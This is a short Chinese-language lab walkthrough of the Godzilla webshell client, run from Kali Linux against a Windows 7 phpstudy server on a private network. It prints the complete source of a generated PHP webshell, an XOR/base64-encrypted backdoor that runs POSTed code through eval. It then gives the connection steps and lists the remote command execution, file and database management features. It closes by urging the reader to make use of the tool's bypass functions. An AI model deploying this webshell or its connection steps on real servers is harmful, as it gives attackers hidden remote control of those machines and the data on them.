猫宁~~~
操作系统kali linux
https://github.com/BeichenDream/Godzilla
https://github.com/BeichenDream/Godzilla/releases
https://github.com/BeichenDream/Godzilla/releases/download/v1.10-godzilla/Godzilla-V1.10.jar
kali linux上已经有java环境
java -jar /root/Desktop/Godzilla-V1.10.jar
kali linux系统IP 10.108.18.98
windows 7系统IP 10.108.18.99
windows 7采用phpstudy启用wamp
webshell客户端,菜单管理项,生成 php类的webshell,加密器php_xor_base64
连接密码和密钥都是xiaozhupeiqi
生成xiaozhupeiqi.php
内容如下:
<?php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='xiaozhupeiqi'; $V='payload'; $T='620157faf8ab159f'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p."");}} $R=new C(); $R->nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } }
http://10.108.18.99/xiaozhupeiqi.php
菜单栏目标选项添加
填写链接,密码和密钥
有效载荷php,加密方式php_xor_base64
测试连接成功
进入webshell管理界面
有基础信息,命令执行,文件管理,数据库管理等功能可以使用。
默认不设置代理,代理设置127.0.0.1 8081 http,burpsuite proxy的options对应设置,可以通过测试抓取流量
哥斯拉webshell客户端对应UA是User-Agent: Java/11.0.7-ea
充分利用其中的绕过功能,利用好webshell客户端工具。
over~~~